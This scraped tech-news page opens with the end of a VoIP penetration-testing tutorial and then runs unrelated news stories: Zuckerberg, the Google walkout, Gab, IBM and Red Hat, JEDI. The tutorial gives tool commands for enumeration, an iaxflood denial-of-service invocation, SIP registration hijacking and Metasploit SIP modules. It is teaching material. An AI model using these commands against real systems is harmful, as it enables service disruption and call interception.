You know what to do now. After footprinting and scanning, we need to enumerate the target. As you can see, when exploiting an infrastructure we generally follow the same methodological steps. Banner grabbing is a well-known technique in enumeration, and the first step to enumerate a VoIP infrastructure is by starting a banner grabbing move. In order to do that, using the Netcat utility would help you grab the banner easily, or you can simply use the Nmap script named banner: nmap -sV --script=banner <target> For a specific vendor, there are a lot of enumeration tools you can use; EnumIAX is one of them. It is a built-in enumeration tool in Kali Linux to brute force Inter-Asterisk Exchange protocol usernames: Automated Corporate Enumerator (ACE) is another built-in enumeration tool in Kali Linux: svmap is an open source built-in tool in Kali Linux for identifying SIP devices. Type svmap -h and you will get all the available options for this amazing tool: VoIP attacks By now, you have learned the required skills to perform VoIP footprinting, scanning, and enumeration. Let's discover the major VoIP attacks. VoIP is facing multiple threats from different attack vectors. Denial-of-Service Denial-of-Service (DoS) is a threat to the availability of a network. DoS could be dangerous too for VoIP, as ensuring the availability of calls is vital in modern organizations. Not only the availability but also the clearness of calls is a necessity nowadays. To monitor the QoS of VoIP, you can use many tools that are out there; one of them is CiscoWorks QoS Policy Manager 4.1: To measure the quality of VoIP, there are some scoring systems, such as the Mean Opinion Score (MOS)  or the R-value based on several parameters (jitter, latency, and packet loss). Scores of the mean opinion score range from 1 to 5 (bad to very clear) and scores of R-value range from 1 to 100 (bad to very clear). The following screenshot is taken from an analysis of an RTP packet downloaded from the Wireshark website: You can also analyze the RTP jitter graph: VoIP infrastructure can be attacked by the classic DoS attacks. We saw some of them previously: Smurf flooding attack TCP SYN flood attack UDP flooding attack One of the DoS attack tools is iaxflood. It is available in Kali Linux to perform DoS attacks. IAX stands for  Inter-Asterisk Exchange. Open a Kali terminal and type  iaxflood <Source IP> <Destination IP>  <Number of packets>: The VoIP infrastructure can not only be attacked by the previous attacks attackers can perform packet Fragmentation and Malformed Packets to attack the infrastructure, using fuzzing tools. Eavesdropping Eavesdropping is one of the most serious VoIP attacks. It lets attackers take over your privacy, including your calls. There are many eavesdropping techniques; for example, an attacker can sniff the network for TFTP configuration files while they contain a password. The following screenshot describes an analysis of a TFTP capture: Also, an attacker can harvest phone numbers and build a valid phone numbers databases, after recording all the outgoing and ongoing calls. Eavesdropping does not stop there, attackers can record your calls and even know what you are typing using the Dual-Tone Multi-Frequency (DTMF). You can use the DTMF decoder/encoder from this link http://www.polar-electric.com/DTMF/: Voice Over Misconfigured Internet Telephones (VOMIT) is a great utility to convert Cisco IP Phone conversations into WAV files. You can download it from its official website http://vomit.xtdnet.nl/: SIP attacks Another attacking technique is SIP rogues. We can perform two types of SIP rogues. From an attacker's perspective, we can implement the following: Rogue SIP B2BUA: In  this attacking technique, the attacker mimics SIP B2BUA: SIP rogue as a proxy: Here, the attacker mimics a SIP proxy:   SIP registration hijacking SIP registration hijacking is a serious VoIP security problem. Previously, we saw that before establishing a SIP session, there is a registration step. Registration can be hijacked by attackers. During a SIP registration hijacking attack, the attacker disables a normal user by a Denial of Service, for example, and simply sends a registration request with his own IP address instead of that users because, in SIP, messages are transferred clearly, so SIP does not ensure the integrity of signalling messages: If you are a Metasploit enthusiast, you can try many other SIP modules. Open a Metasploit console by typing msfconsole and search SIP modules using search SIP: To use a specific SIP module, simply type use <module >. The following interface is an example of SIP module usage: Spam over Internet Telephony Spam over Internet Telephony (SPIT), sometimes called Voice spam, is like email spam, but it affects VoIP. To perform a SPIT attack, you can use a generation tool called spitter. Embedding malware Malware is a major threat to VoIP infrastructure. Your insecure VoIP endpoints can be exploited by different types of malware, such as Worms and VoIP Botnets. Softphones are also a highly probable target for attackers. Compromising your softphone could be very dangerous because if an attacker exploits it, they can compromise your VoIP network. Malware is not the only threat against VoIP endpoints. VoIP firmware is a potential attack vector for hackers. Firmware hacking can lead to phones being compromised. Viproy – VoIP penetration testing kit Viproy VoIP penetration testing kit (v4)  is a VoIP and unified communications services pentesting tool presented at Black Hat Arsenal USA 2014 by Fatih Ozavci: To download this project, clone it from its official repository, https://github.com/fozavci/viproy-voipkit: # git clone https://github.com/fozavci/viproy-voipkit. The following project contains many modules to test SIP and Skinny protocols: To use them, copy the lib, modules, and data folders to a Metasploit folder in your system. Thus, in  this article, we demonstrated how to exploit the VoIP infrastructure. We explored the major VoIP attacks and how to defend against them, in addition to the tools and utilities most commonly used by penetration testers. If you've enjoyed reading this, do check out Advanced Infrastructure Penetration Testing to discover post-exploitation tips, tools, and methodologies to help your organization build an intelligent security system. Managing a VoIP Solution with Active Directory Depends On Your Needs Opus 1.3, a popular FOSS audio codec with machine learning and VR support, is now generally available Approaching a Penetration Test Using Metasploit
Read more
  • 0
  • 0
  • 27239
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at ₹800/month. Cancel anytime
article-image-facebooks-ceo-mark-zuckerberg-summoned-for-hearing-by-uk-and-canadian-houses-of-commons
Bhagyashree R
01 Nov 2018
2 min read
Save for later

Facebook's CEO, Mark Zuckerberg summoned for hearing by UK and Canadian Houses of Commons

Bhagyashree R
01 Nov 2018
2 min read
Yesterday, the chairs of the UK and Canadian Houses of Commons issued a letter calling for Mark Zuckerberg, Facebook’s CEO to appear before them. The primary aim of this hearing is to get a clear idea of what measures Facebook is taking to avoid the spreading of disinformation on the social media platform and to protect user data. It is scheduled to happen at the Westminster Parliament on Tuesday 27th November. The committee has already gathered evidence regarding several data breaches and process failures including the Cambridge Analytica scandal and is now seeking answers from Mark Zuckerberg on what led to all of these incidents. Mark last attended a hearing in April with the Senate's Commerce and Judiciary committees this year in which he was asked about the company’s failure to protect its user data, its perceived bias against conservative speech, and its use for selling illegal material like drugs. After which he has not attended any of the hearings and instead sent other senior representatives such as Sheryl Sandberg, COO at Facebook. The letter pointed out: “You have chosen instead to send less senior representatives, and have not yourself appeared, despite having taken up invitations from the US Congress and Senate, and the European Parliament.” Throughout this year we saw major security and data breaches involving Facebook. The social media platform faced a security issue last month which impacted almost 50 million user accounts. Its engineering team discovered that hackers were able to find a way to exploit a series of bugs related to the View As Facebook feature. Earlier this year, Facebook witnessed a backlash for the Facebook-Cambridge Analytica data scandal. It was a major political scandal about Cambridge Analytica using personal data of millions of Facebook users for political purposes without their permission. The reports of this hearing will be shared in December if at all Zuckerberg agrees to attend it. The committee has requested his response till 7th November. Read the full letter issued by the committee. Facebook is at it again. This time with Candidate Info where politicians can pitch on camera Facebook finds ‘no evidence that hackers accessed third party Apps via user logins’, from last week’s security breach How far will Facebook go to fix what it broke: Democracy, Trust, Reality
Read more
  • 0
  • 0
  • 1807

article-image-google-employees-walkout-for-real-change-today-these-are-their-demands
Natasha Mathur
01 Nov 2018
5 min read
Save for later

Google employees ‘Walkout for Real Change’ today. These are their demands.

Natasha Mathur
01 Nov 2018
5 min read
More than 1500 Google employees, around the world, are planning to walk out of their respective Google offices today, to protest against Google’s handling of sexual misconduct within the workplace, according to the New York Times. This is a part of the “women’s walkout” that was organized by more than 200 Google engineers, earlier this week as a response to Google’s handling of sexual misconduct in the recent past, that employees found as inadequate. The planning for the walkout was done last Friday, where Claire Stapleton, product marketing manager at Google’s YouTube created an internal mailing list to organize the walkout according to the New York Times. As the walkout was organized, more than 200 employees had joined in over the weekend, which has since grown to more than 1,500. The organizers took to Twitter, yesterday, to lay out five demands for change within the workplace. The protest has already started at Google’s Tokyo and Singapore office. Google employees and contractors, across the globe, will be leaving work at 11:10 AM in their respective time zones.   Here are some glimpses from the walkout: https://twitter.com/GoogleWalkout/status/1058199862502612993 https://twitter.com/EmmaThomson2/status/1058180157804994562 https://twitter.com/GoogleWalkout/status/1058018104930897920 https://twitter.com/GoogleWalkout/status/1058010748444700672 https://twitter.com/GoogleWalkout/status/1058003099581853697 The demands laid out by the Google employees are as follows: An end to Forced Arbitration in cases of harassment and discrimination for all current and future employees. This means that Google should no longer require people to waive their right to sue. In fact, every co-worker should be given the right to bring a co-worker, representative, or supporter of their choice when meeting with HR for filing a harassment claim. A commitment to end pay and opportunity inequity. This includes making sure that there are women of color at all the levels of the organization. There should also be transparent data on the gender, race, and ethnicity compensation gap, across both level and years of industry experience.  The methods and techniques that have been used to aggregate such data should also be transparent. A publicly disclosed sexual harassment transparency report. This includes the number of harassment claims at Google over time, types of claims submitted, how many victims and accused have left Google, details about exit packages and their worth. A clear, uniform, and globally inclusive process for reporting sexual misconduct safely and anonymously. This is because the current process in place is not working. HR’s performance is assessed by senior management and directors, which forces them to put the management’s interest ahead of the employees that report harassment and discrimination. Accountability, safety, and ability to report regarding unsafe working conditions should not be dictated by the employment status. Elevate the Chief Diversity Officer to answer directly to the CEO and make recommendations directly to the Board of Directors. Appoint an Employee Rep to the Board. The frustration among the Google employees surfaced after the New York Times report brought to light the shocking allegations against Andy Rubin’s (creator of Android) sexual misconduct at Google. As per the report, Rubin was accused of misbehavior in 2014 and the allegations were confirmed by Google. Due to this, he was asked to leave by former Google CEO, Mr.Page, but what’s discreditable is the fact that Google paid him $90 million as an exit package. Moreover,  he also received a high profile well-respected farewell by Google in October 2014. Also, the fact that senior executives such as Drummond, Chief Legal Officer, Alphabet, who were mentioned in the NY times report for indulging in “inappropriate relationships” within the organization continues to work in highly placed positions at Google and haven’t faced any real punitive action by Google for their past behavior. “We don’t want to feel that we’re unequal or we’re not respected anymore. Google’s famous for its culture. But in reality, we’re not even meeting the basics of respect, justice, and fairness for every single person here”, Stapleton told the NY Times. Google CEO Sundar Pichai had sent an email to all the Google employees, last Thursday, clarifying that the company has fired 48 people over the last two years for sexual harassment, out of whom, 13  were “senior managers and above”. He also mentioned how none of them received any exit packages. Sundar Pichai, Google’s CEO, further apologized in an email obtained by Axios this Tuesday, saying that the “apology at TGIF didn’t come through, and it wasn’t enough”. Pichai also mentioned that he supports the engineers at Google who have organized a “walkout”. “I am taking in all your feedback so we can turn these ideas into action. We will have more to share soon. In the meantime, Eileen will make sure managers are aware of the activities planned for Thursday and that you have the support you need”, wrote Pichai. The very same day, news of Richard DeVaul, a director at unit X of Alphabet (Google’s parent company) whose name was also mentioned in the New York Times report, resigning from the company came to light. DeVaul had been accused of sexually harassing Star Simpson, a hardware engineer. DeVaul did not receive any exit package on his resignation. Public response to the walkout has been largely positive: https://twitter.com/lizthegrey/status/1057859226100355072 https://twitter.com/amrtgaber/status/1057822987527761920 https://twitter.com/sparker2/status/1057846019122069508 https://twitter.com/LisaIronTongue/status/1057852658948595712 Ex-googler who quit Google on moral grounds writes to Senate about company’s “Unethical” China censorship plan OK Google, why are you ok with mut(at)ing your ethos for Project DragonFly? Google takes steps towards better security, introduces new API policies for 3rd parties and a Titan Security system for mobile devices
Read more
  • 0
  • 0
  • 2862

article-image-social-media-platforms-twitter-and-gab-com-accused-of-facilitating-recent-domestic-terrorism-in-the-u-s
Savia Lobo
29 Oct 2018
6 min read
Save for later

Social media platforms, Twitter and Gab.com, accused of facilitating recent domestic terrorism in the U.S.

Savia Lobo
29 Oct 2018
6 min read
Updated on 30th Oct 2018: Following PayPal, two additional platforms, Stripe and Joyent have suspended Gab accounts from their respective platforms. Social media platforms Twitter and Gab.com were at the center of two shocking stories of domestic terrorism. Both platforms were used to send by the men responsible for the mail bomb attacks and Pittsburgh’s Tree of Life synagogue shooting to send cryptic threats. Following the events, both platforms have been accused of failing to act appropriately, both in terms of their internal policies, and their ability to coordinate with law enforcement to deal with the threats. Twitter fails to recognize a bomb attacker. Mail bomber sent a threat first on Twitter Twitter neglected an abuse report by a Twitter user against mail bombing suspect. Rochelle Ritchie, a former congressional press secretary, tweeted that she had received threats from Cesar Altieri Sayoc via Twitter. Sayoc was later arrested and charged in connection with mailing at least 13 suspected explosive devices to prominent Democrats, the staff at CNN, and other U.S. officials, as Bloomberg reported. On October 11, Ritchie received a tweet from an account using the handle @hardrock2016. The message was bizarre, saying, “So you like make threats. We Unconquered Seminole Tribe will answer your threats. We have nice silent Air boat ride for u here on our land. We will see you 4 sure. Hug your loved ones real close every time you leave your home.” Ritchie immediately reported this to twitter as abuse. Following this, Twitter responded that the tweet did not qualify as a “violation of the Twitter rules against abusive behavior.” The tweet was visible on Twitter until Sayoc was arrested on Friday. Ritchie tweeted again on Friday, “Hey @Twitter remember when I reported the guy who was making threats towards me after my appearance on @FoxNews and you guys sent back a bs response about how you didn’t find it that serious. Well, guess what it’s the guy who has been sending #bombs to high profile politicians!!!!” Later in the day, Twitter apologized in reply to Ritchie’s tweet saying it should have taken a different action when Ritchie had first approached them. Twitter's statement said. "The Tweet clearly violated our rules and should have been removed. We are deeply sorry for that error." Twitter has been keen to assure users that it is working hard to combat harassment and abuse on its platform. But many users disagree. https://twitter.com/Luvvie/status/1055889940150607872 Even the apology sent to Ritchie looks a lot like the company is trying to push the matter under the carpet. This wasn’t the first time Sayoc used Twitter to post his sentiments. On September 18th, Sayoc tweeted a picture of former Vice President Joe Biden’s home and wrote, "Hug your loved son, Niece, wife family real close everytime U walk out your home." On September 20, in response to a tweet from President Trump, Sayoc posted a video of himself at what appears to be a Donald Trump rally. The text of the tweet threatened former Vice President Joe Biden and former attorney general Eric Holder. Later that week, they were targeted by improvised explosive devices. Twitter suspended Sayoc's accounts late Friday afternoon last week. Shooter hinted at Pittsburgh shooting on Gab.com "It's a very horrific crime scene; One of the worst that I've seen" - Public Safety Director Wendell Hissrich said at a press conference Gab.com, which is described as “The Home Of Free Speech Online” was allegedly linked to the shooting at a synagogue in Pittsburgh on Saturday, 27th October’18. The 46-year-old suspected shooter named Robert Bowers, posted on his Gab page, “jews are the children of satan.” He also reportedly shouted “all Jews must die” before he opened the round of firing at the Tree of Life synagogue in Pittsburgh’s Squirrel Hill neighborhood. According to The Hill’s report, “Gab.com rejected claims it was responsible for the shooting after it confirmed that the name identified in media reports as the suspect matched the name on an account on its platform.” PayPal, GoDaddy suspend Gab.com for promoting hate speech Following the Pittsburgh shooting incident, PayPal has banned Gab.com. A PayPal spokesperson confirmed the ban to The Verge, citing hate speech as a reason for the action, “The company is diligent in performing reviews and taking account actions. When a site is explicitly allowing the perpetuation of hate, violence or discriminatory intolerance, we take immediate and decisive action.” https://twitter.com/getongab/status/1056283312522637312 Similarly, GoDaddy, a domain hosting website, has threatened to suspend the Gab.com domain if it fails to transfer to a new provider. Currently, Gab is inaccessible through the GoDaddy website. Gab.com denies enabling hate speech Denying the claims, Gab.com said that it has zero tolerance for terrorism and violence.“Gab unequivocally disavows and condemns all acts of terrorism and violence,” the site said in a statement. “This has always been our policy. We are saddened and disgusted by the news of violence in Pittsburgh and are keeping the families and friends of all victims in our thoughts and prayers.” Gab was quick to respond to the accusation, taking swift and proactive action to contact law enforcement. It first backed up all user data from the account and then proceeded to suspend the account. “We then contacted the FBI and made them aware of this account and the user data in our possession. We are ready and willing to work with law enforcement to see to it that justice is served”, Gab said. Gab.com also stated that the shooter had accounts on other social media platforms including Facebook, which has not yet confirmed the deactivation of the account. Federal investigators are reportedly treating the attack as a potential hate crime. This incident is a stark reminder of how online hate can easily escalate into the real world. It also sheds light on how easy it is to misuse any social media platform to post threat attacks; some of which can also be a hoax. Most importantly it underscores how social media platforms are ill-equipped to not just identify such threats but also in prioritizing manually flagged content by users and in alerting concerned authorities on time to avert tragedies such as this. To gain more insights on these two scandals, head over to CNN and The Hill. 5 nation joint Activity Alert Report finds most threat actors use publicly available tools for cyber attacks Twitter on the GDPR radar for refusing to provide a user his data due to ‘disproportionate effort’ involved 90% Google Play apps contain third-party trackers, share user data with Alphabet, Facebook, Twitter, etc: Oxford University Study
Read more
  • 0
  • 0
  • 2629

article-image-4-reasons-ibm-bought-red-hat-for-34-billion
Richard Gall
29 Oct 2018
8 min read
Save for later

4 reasons IBM bought Red Hat for $34 billion

Richard Gall
29 Oct 2018
8 min read
The news that IBM is to buy Red Hat - the enterprise Linux distribution - shocked the software world this weekend. It took many people by surprise because it signals a weird new world where the old guard of tech conglomerates - almost prehistoric in the history of the industry - are revitalizing themselves by diving deep into the open source world for pearls. So, why did IBM decide to buy Red Hat? And why has it spent so much to do it? Why did IBM decide to buy Red Hat? For IBM this was an expensive step into a new world. But they wouldn't have done it without good reason. And although it's hard to center on one single reason that forced IBM's decision makers to put money on the table, there are certainly a combination of factors that meant this move simply makes sense from IBM's perspective. Here are 4 reasons why IBM is buying Red Hat: Competing in the cloud market Disappointment around the success of IBM Watson Catching up with Microsoft To help provide support for an important but struggling Linux organization Let's take a look at each of these in more detail. IBM wants to get serious about cloud computing IBM has been struggling in a competitive cloud market. It's not exactly out of the running, with some reports placing them in third after AWS and Microsoft Azure, and others in fourth, with Google's cloud offering above them. But wherever the company stands, it's true that it is not growing at anywhere near the rate of its competitors. Put simply, if it didn't act, IBM would lose significant ground in the cloud computing race. It's no coincidence that cloud was right at the top of the IBM press release. Ginni Rometty, IBM Chairman, President and Chief Executive Officer, is quoted as saying "The acquisition of Red Hat is a game-changer. It changes everything about the cloud market... IBM will become the world's #1 hybrid cloud provider, offering companies the only open cloud solution that will unlock the full value of the cloud for their businesses." Clearly, IBM wants to bring itself up to date. As The Register wrote when they covered the story on Sunday IBM "really, really, really wants to transform itself into a cool and trendy hybrid cloud platform, rather than be seen eternally as a maintainer of legacy mainframes and databases." But why buy Red Hat? You might still be thinking well, why does IBM need Red Hat to do all this? Can't it just do it itself? It ultimately comes down to expanding what businesses can do with cloud - and bringing an open source company into the IBM family will allow IBM to deliver much more effectively on this than they have before. AWS appears to implicitly understand that features and capabilities are everything when it comes to cloud - to be truly successful, IBM needs to adopt both an open source mindset and toolset to innovate at a fast pace. This is what Rometty is referring to when she talks about "the next chapter of the cloud." This is where cloud becomes more about "extracting more data and optimizing every part of the business, from supply chains to sales" than storage space. IBM's artificial intelligence product, Watson, hasn't taken off IBM is a company with its proverbial finger in many pies. Its artificial intelligence product, Watson, hasn't had the success that the company expected. Instead, it has suffered a number of disappointing setbacks this year, resulting in Deborah DiSanzo, the head of Watson Health, stepping down just a week ago. One of the biggest stories was MD Anderson Cancer Center stepping away from a contract with IBM, after a report by analysts at investment bank Jeffries claimed that the software was "not ready for human investigational or clinical use." But there are other stories too - all of which come together to paint a picture of a project that doesn't live up to or deliver on its hype. By contrast, AI has been most impactful as a part of a cloud product. Just look at the furore around the AI tools within AWS - there's no way government agencies and the military would be quite so interested in the product if it wasn't packaged in a way that could be easily deployed. AWS, unlike IBM, understood that AI is only worth the hype if organizations can use it easily. In effect, we're past the period where AI deserves hype on its own - it needs to be part of a wider suite of capabilities that enable innovation and invention with minimal friction. If IBM is to offer out Watson's capabilities to a wide portion of users, all with varying use cases, IBM can begin to think much more about how the end product can deliver the biggest impact for these individual cases. IBM is playing catch up with Microsoft in terms of open source IBM's move might be surprising, but in the context of Microsoft's transformation over the last decade, it's part of a wider pattern. The only difference is that Microsoft's attitude to open source has slowly thawed, whereas IBM has gone all out, taking an unexpected leap into the unknown. It's a neat coincidence that this was the weekend that GitHub officially became part of Microsoft. It's as if IBM saw Microsoft basking in the glow of an open source embrace and thought we want that. Envy aside, there are serious implications. The future is now quite clearly open source - in fact, it has been for some time. You might even say that Microsoft hasn't been as quick as it could have been. But for IBM, open source has been seen simply as a tasty slice of the software pie - great, but not the whole thing. This was a misunderstanding - open source is everything. It almost doesn't even make sense to talk about open source as if it were distinctive from everything else - it is software today. It's defining the future. Joseph Jacks, the founder of Open Source Capital, said  that "IBM buying @RedHat is not about dominating the cloud. It is about becoming an OSS company. The largest proprietary software and tech companies in the world are now furiously rushing towards the future. An open future. An open source software driven future. OSS eats everything." https://twitter.com/asynchio/status/1056693588640194560   IBM is heavily invested in Linux - and RedHat isn't exactly thriving However, although open source might be the dominant mode of software in 2018, there are a few murmurs about it's sustainability and resilience. So, despite being central to just about everything we build and use when it comes to software, from a business perspective it isn't exactly thriving. Red Hat is a brilliant case in point. Despite being one of the first and most successful open source software businesses, providing free, open source software to customers in return for a support fee, revenues are down. Shares fell 14% in June following a disappointing financial forecast - and have fallen further since then. This piece in TechCrunch, almost 5 years old, does a good job of explaining the relative success of Red Hat, as well as its limitations: "When you compare the market cap and revenue of Red Hat to Microsoft or Amazon or Oracle, even Red Hat starts to look like a lukewarm success. The overwhelming success of Linux is disproportionate to the performance of Red Hat. Great for open source, a little disappointing for Red Hat." From this perspective, this sets the stage for an organisation like IBM to come in and start investing in Red Hat as a foundational component of its future product and software strategy. Given that both organizations are heavily invested in Linux, this could be a really important relationship in supporting the project in the future. And although a multi-billion acquisition might not look like open source in action, it might also be one of the only ways that it's going to survive and thrive in the future. Thanks to Amarabha Banerjee, Aarthi Kumaraswamy, and Amey Varangaonkar for their help with this post. Update on 9th July, 2019 As pert the reports from The Fortune, IBM on Tuesday morning closed its $34 billion acquisition of Red Hat, which was announced last October. The pricey deal, which paid Red Hat owners a hefty premium of more than 60%, marks IBM CEO Ginni Rometty’s biggest bet yet in transforming her 108-year-old technology company. In an interview Tuesday morning, she said some tech analysts have assumed the move to the cloud would lead to a “winner take all” scenario, where one giant platform—Amazon Web Services?—ends up with all the business. Read the full story here.
Read more
  • 0
  • 0
  • 12301
article-image-we-are-not-going-to-withdraw-from-the-future-says-microsofts-brad-smith-on-the-ongoing-jedi-bid-amazon-concurs
Prasad Ramesh
29 Oct 2018
5 min read
Save for later

‘We are not going to withdraw from the future’ says Microsoft’s Brad Smith on the ongoing JEDI bid, Amazon concurs

Prasad Ramesh
29 Oct 2018
5 min read
The Pentagon has been trying to get a hold of AI and related technologies from tech giants. Google employees had quit over it, Microsoft employees had asked the company to withdraw from the JEDI project. Last Friday, Microsoft President Brad Smith wrote about Microsoft and the US Military and the company’s visions in this area. Amazon, Microsoft, IBM, and Oracle are the companies who have bid for the Joint Enterprise Defense Infrastructure (JEDI) project. JEDI is a department wide cloud computing infrastructure that will give the Pentagon access to weapons systems enhanced with artificial intelligence and cloud computing. Microsoft believes in defending USA “We are not going to withdraw from the future, in the most positive way possible, we are going to work to help shape it.” said Brad Smith, President at Microsoft indicating that Microsoft intends to provide their technology to the Pentagon. Microsoft did not shy away from bidding in the Pentagon’s JEDI project. This in contrast to Google, which opted out of the same program earlier this month citing ethical concerns. Smith expressed Microsoft’s intent towards providing AI and related technologies to the US defense department saying, “we want the people who defend USA to have access to the nation’s best technology, including from Microsoft”. Smith stated that Microsoft’s work in this area is based on three convictions: Microsoft believes in the strong defense of USA and wants the defenders to have access to USA’s best technology, this includes Microsoft They want to use their ‘knowledge and voice’ to address ethical AI issues via the nation’s ‘civic and democratic processes’. They are giving their employees to opt out of work on these projects given that as a global company they consist of employees from different countries. Smith shared that Microsoft has had a long standing history with the US Department of Defense (DOD). Their tech has been used throughout the US military from the front office to field operations. This includes bases, ships, aircraft and training facilities. Amazon shares Microsoft’s visions Amazon too shares these visions with Microsoft in empowering US law and defense institutions with the latest technology. Amazon already provides cloud services to power the Central Intelligence Agency (CIA). Amazon CEO, Jeff Bezos said: “If big tech companies are going to turn their back on the Department of Defense, this country is going to be in trouble.” Amazon also provides the US law enforcement with their facial recognition technology called Rekognition. This has been a bone of contention for not just civil rights groups but also for some Amazon’s employees. Rekognition will help in identifying and incarcerating undesirable people. But it does not really work with accuracy. In a study by ACLU, Rekognition identified 28 people from the US congress incorrectly. The American Civil Liberties Union (ACLU) has now filed a Freedom of Information Act (FOIA) request which demands the Department of Homeland Security (DHS) to disclose how DHS and Immigration and Customs Enforcement (ICE) use Rekognition for law enforcement and immigration checks. Google’s rationale for withdrawing from the JEDI project Last week, in an interview with the Fox Network, Oracle founder Larry Ellison stated that it was shocking how Google viewed this matter. Google withdrew from the JEDI project following strong backlash from many of its employees. In the official statement, they have stated the reason for dropping out of the JEDI contract bidding as an ethical value misalignment and also that they don’t fully have all necessary clearance to work on Government projects.’ However, Google is open to launching a customized search engine in China that complies with China’s rules of censorship including potential to surveil Chinese citizens. Should AI be used in weapons? This question is the at the heart of the contentious topic of the tech industry working with the military. It is a serious topic that has been debated over the years by educated scientists and experienced leaders. Elon Musk, researchers from DeepMind and other companies even pledged to not build lethal AI. Personally, I side with the researchers and believe AI should be used exclusively for the benefit of mankind, to enhance human lives and solve problems that would prosper people’s lives. And not against each other in a race to build weapons or to become a superpower. But then again what would I know? Leading nations are in an AI arms race as we speak, with sophisticated national AI plans and agendas. For more details on Microsoft’s interest in working with the US Military visit the Microsoft website. ‘Employees of Microsoft’ ask Microsoft not to bid on US Military’s Project JEDI in an open letter Google employees quit over company’s continued Artificial Intelligence ties with the Pentagon Oracle’s bid protest against U.S Defence Department’s(Pentagon) $10 billion cloud contract
Read more
  • 0
  • 0
  • 2349

article-image-ibm-acquired-red-hat-for-34-billion-making-it-the-biggest-open-source-acquisition-ever
Sugandha Lahoti
29 Oct 2018
4 min read
Save for later

IBM acquired Red Hat for $34 billion making it the biggest open-source acquisition ever

Sugandha Lahoti
29 Oct 2018
4 min read
In probably the biggest open source acquisition ever, IBM has acquired all of the issued and outstanding common shares of Red Hat for $190.00 per share in cash, representing a total enterprise value of approximately $34 billion. However, if this deal is more of a business proposition than a community contributor is a question. Red Hat has been struggling on the market recently. Red Hat missed its most recent revenue estimates and its guidance fell below Wall Street targets. Prior to this deal, it had a market capitalization of about $20.5 billion. With this deal, Red Hat may soon take control of it’s sinking ship. It will also remain a distinct unit within IBM. The company will continue to be led by Jim Whitehurst, Red Hat’s CEO and Red Hat's current management team. Jim Whitehurst also will join IBM's senior management team and report to Ginni Rometty, IBM Chairman, President, and Chief Executive Officer. Why is Red Hat joining forces with IBM? In the announcement, Jim assured that IBM’s acquisition of Red Hat will help them accelerate without compromising their culture and policies. He said, "Open source is the default choice for modern IT solutions, and I'm incredibly proud of the role Red Hat has played in making that a reality in the enterprise.” He also added that, “Joining forces with IBM will provide us with a greater level of scale, resources, and capabilities to accelerate the impact of open source as the basis for digital transformation and bring Red Hat to an even wider audience--all while preserving our unique culture and unwavering commitment to open source innovation." What is IBM gaining from this acquisition? IBM believes this acquisition to be a game changer. "It changes everything about the cloud market," said Ginni, "IBM will become the world's #1 hybrid cloud provider, offering companies the only open cloud solution that will unlock the full value of the cloud for their businesses. IBM and Red Hat will accelerate hybrid multi-cloud adoption across all companies. They plan to together, “help clients create cloud-native business applications faster, drive greater portability and security of data and applications across multiple public and private clouds, all with consistent cloud management.” "IBM is committed to being an authentic multi-cloud provider, and we will prioritize the use of Red Hat technology across multiple clouds," said Arvind Krishna, Senior Vice President, IBM Hybrid Cloud. "In doing so, IBM will support open source technology wherever it runs, allowing it to scale significantly within commercial settings around the world." IBM assures that it will continue to build and enhance Red Hat partnerships with major cloud providers. It will also remain committed to Red Hat's open governance, open source contributions, participation in the open source community and development model. The company is keen on preserving the independence and neutrality of Red Hat's open source development culture and go-to-market strategy. The news was well received by the top Red Hat decision makers who embraced this with open arms. However, ZDNet reported that many RedHat employees were skeptical: "I can't imagine a bigger culture clash." "I'll be looking for a job with an open-source company." "As a Red Hat employee, almost everyone here would prefer it if we were bought out by Microsoft." People’s reactions on twitter on this acquisition are also varied: https://twitter.com/samerkamal/status/1056611186584604672 https://twitter.com/pnuojua/status/1056787520845955074 https://twitter.com/CloudStrategies/status/1056666824434020352 https://twitter.com/svenpet/status/1056646295002247169 Read more about the news on IBM’s newsroom. Red Hat infrastructure migration solution for proprietary and siloed infrastructure. IBM launches Industry’s first ‘Cybersecurity Operations Center on Wheels’ for on-demand cybersecurity support IBM Watson announces pre-trained AI tools to accelerate IoT operations
Read more
  • 0
  • 0
  • 2425

article-image-how-to-easily-access-a-windows-system-using-publicly-available-exploits-video
Savia Lobo
26 Oct 2018
2 min read
Save for later

How to easily access a Windows system using publicly available exploits [Video]

Savia Lobo
26 Oct 2018
2 min read
The recent ‘Activity Alert Report’ released by the NCCIC highlights that the majority of the exploits over the globe are mainly caused by publicly available tools. Read our article on the five most frequently used tools used by cybercriminals all over the globe to perform cyber crimes for more details. Exploiting a vulnerability in a software running on a machine can give access to the entire machine. The vulnerable application can be a service running in the OS or a web server or an SSH server. Any service that opens a port or is accessible in some other way can be targeted. Exploit development is an extremely time-consuming and complex process. Hence it is difficult to develop your own exploit. In most penetration tests, publicly available exploits are used. The working of the exploit depends on various factors like version number of the vulnerable system, the way it is configured and the OS used. In this video, Gergely Révay shows how to use public exploits to exploit a vulnerability in a software running on a windows 10 machine. Watch Gergely’s video below to learn how to use public exploits demonstrated with a practical example using exploit-db.com. https://www.youtube.com/watch?v=2YoYyWGFU6A About Gergely Révay Gergely Révay, the instructor of this course, is a penetration testing Senior Key Expert at Siemens Corporation, Germany. He has worked as a penetration tester since 2011. Before that, he was a quality assurance engineer in his home country, Hungary. As a consultant, he performed penetration tests and security assessments in various industries, such as insurance, banking, telco, mobility, healthcare, industrial control systems, and even car production. To know more about public exploits and to master various exploits and post exploitation techniques, check out Gergely’s course, ‘Practical Windows Penetration Testing [Video]’ jQuery File Upload plugin exploited by hackers over 8 years, reports Akamai’s SIRT researcher MongoDB switches to Server Side Public License (SSPL) to prevent cloud providers from exploiting its open source code A year later, Google Project Zero still finds Safari vulnerable to DOM fuzzing using publicly available tools to write exploits
Read more
  • 0
  • 0
  • 2107
article-image-sir-tim-berners-lee-on-digital-ethics-and-socio-technical-systems-at-icdppc-2018
Sugandha Lahoti
25 Oct 2018
4 min read
Save for later

Sir Tim Berners-Lee on digital ethics and socio-technical systems at ICDPPC 2018

Sugandha Lahoti
25 Oct 2018
4 min read
